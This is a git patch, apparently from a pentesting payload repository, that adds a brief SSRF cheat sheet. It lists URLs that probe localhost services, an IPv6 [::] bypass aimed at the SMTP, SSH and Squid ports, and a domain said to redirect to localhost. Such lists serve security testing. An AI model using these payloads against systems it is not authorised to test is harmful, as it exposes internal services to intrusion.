From a76711ed59a086e9ee2e460790bc130496e936a5 Mon Sep 17 00:00:00 2001 From: swisskyrepo Date: Tue, 18 Oct 2016 14:54:41 +0700 Subject: [PATCH] SSRF payloads --- SSRF/README.md | 34 ++++++++++++++++++++++++++++------ 1 file changed, 28 insertions(+), 6 deletions(-) diff --git a/SSRF/README.md b/SSRF/README.md index c707ab4..f98d771 100644 --- a/SSRF/README.md +++ b/SSRF/README.md @@ -1,12 +1,34 @@ -# Title -Lorem +# Server-Side Request Forgery +Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on behalf of him. -## Vuln +## Exploit +Basic SSRF v1 ``` -Code +http://127.0.0.1:80 +http://127.0.0.1:443 +http://127.0.0.1:22 +``` + +Basic SSRF v2 +``` +http://localhost:80 +http://localhost:443 +http://localhost:22 +``` + +Bypass localhost with [::] +``` +http://[::]:80/ +http://[::]:25/ SMTP +http://[::]:22/ SSH +http://[::]:3128/ Squid +``` + +Bypass localhost with a domain redirecting to locahost +``` +http://n-pn.info ``` ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* \ No newline at end of file